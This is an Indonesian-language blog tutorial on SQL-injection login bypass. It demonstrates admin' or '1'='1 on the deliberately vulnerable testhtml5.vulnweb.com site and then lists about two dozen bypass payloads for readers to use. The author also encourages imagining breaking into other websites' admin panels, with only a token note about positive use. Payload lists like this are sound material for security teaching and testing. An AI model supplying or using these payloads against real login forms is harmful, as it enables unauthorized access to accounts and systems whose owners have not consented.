BYPASS ADMIN OR USER LOGIN TUTORIAL

Pada kesempatan yang berbahagia ini saya akan bagikan sedikit cara untuk kita membypass sebuah laman login tanpa harus tau username dan password dari si website tersebut. Disini saya mengmbil salah satu website yang vulner dari VULNWEB dengan url http://testhtml5.vulnweb.com nah disini kita bisa login dengan membypass username dan password, seperti di bawah ini

login page

nah tampak halaman login diatas saya coba lakukan bypass terhadap username dan password dengan admin’ or ‘1’=’1  dan ternyata login berhasil di lakukan hanya dengan membypass login nya

login success

nah gambar diatas menunjukkan bahwa kita berhasil masuk dashboard dengan keterangan Welcome admin’ or ‘1’=’1 | Logout, artinya user yang terdeteksi adalah admin’ or ‘1’=’1. Bayangkan saja apabila kita berhasil menembus sistem administrator website lain hanya dengan menggunakan logika matematika sederhana seperti diatas, keren bukan sobat progress.

 

Berikut saya bagikan beberapa bypass code lain yang dapat digunakan:

‘ or ”=’
a’ OR 1=1 LIMIT #
or 1=1
or 1=1–
or 1=1#
or 1=1/*
admin’ —
admin’ #
admin’/*
admin’ or ‘1’=’1
admin’ or ‘1’=’1′–
admin’ or ‘1’=’1’#
admin’ or ‘1’=’1’/*
admin’or 1=1 or ”=’
admin’ or 1=1
admin’ or 1=1–
admin’ or 1=1#
admin’ or 1=1/*
admin’) or (‘1’=’1
admin’) or (‘1’=’1’–
admin’) or (‘1’=’1’#
admin’) or (‘1’=’1’/*
admin’) or ‘1’=’1
admin’) or ‘1’=’1′–
admin’) or ‘1’=’1’#
admin’) or ‘1’=’1’/*

 

 

Sekian dulu tutorial bypass admin or user login kali ini semoga bermanfaat dan gunakan hanya untuk kegiatan yang positif ya sobat progress dimanpun anda berada.

Leave a Response